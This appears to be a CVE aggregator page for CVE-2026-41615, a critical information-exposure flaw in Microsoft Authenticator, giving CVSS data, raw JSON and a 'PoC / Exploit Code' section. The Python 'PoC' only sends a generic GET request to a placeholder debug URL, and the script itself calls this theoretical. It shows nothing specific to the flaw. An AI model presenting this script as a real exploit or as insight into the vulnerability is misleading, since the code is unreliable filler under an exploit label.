Security Vulnerability Report
中文
CVE-2026-41615 CVSS 9.6 CRITICAL

CVE-2026-41615

Published: 2026-05-14 18:16:47
Last Modified: 2026-05-14 18:19:51

Description

Exposure of sensitive information to an unauthorized actor in Microsoft Authenticator allows an unauthorized attacker to disclose information over a network.

CVSS Details

CVSS Score
9.6
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

Microsoft Authenticator < 2026-05-14 补丁版本

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# Proof of Concept for CVE-2026-41615 # This script demonstrates a simulated scenario where sensitive data might be exposed # due to improper handling in Microsoft Authenticator. # Note: This is a theoretical example for educational purposes. import requests def trigger_leak(target_url): # Attacker setups a listener or prepares a malicious link # The victim interacts with the application (UI:R) # Exploiting the network exposure vector headers = { "User-Agent": "Malicious/Scanner", "Accept": "application/json" } # Simulating the specific endpoint or state that causes leakage response = requests.get(target_url, headers=headers) if response.status_code == 200: print("[+] Potential sensitive information exposure detected.") # Hypothetical sensitive data extraction print("[+] Data:", response.text[:100]) else: print("[-] Exploit failed or target patched.") if __name__ == "__main__": # Placeholder URL representing the vulnerable endpoint target = "http://vulnerable-app/authenticator/api/debug" trigger_leak(target)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-41615", "sourceIdentifier": "[email protected]", "published": "2026-05-14T18:16:47.243", "lastModified": "2026-05-14T18:19:50.767", "vulnStatus": "Undergoing Analysis", "cveTags": [], "descriptions": [{"lang": "en", "value": "Exposure of sensitive information to an unauthorized actor in Microsoft Authenticator allows an unauthorized attacker to disclose information over a network."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H", "baseScore": 9.6, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 6.0}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-200"}]}], "references": [{"url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-41615", "source": "[email protected]"}]}}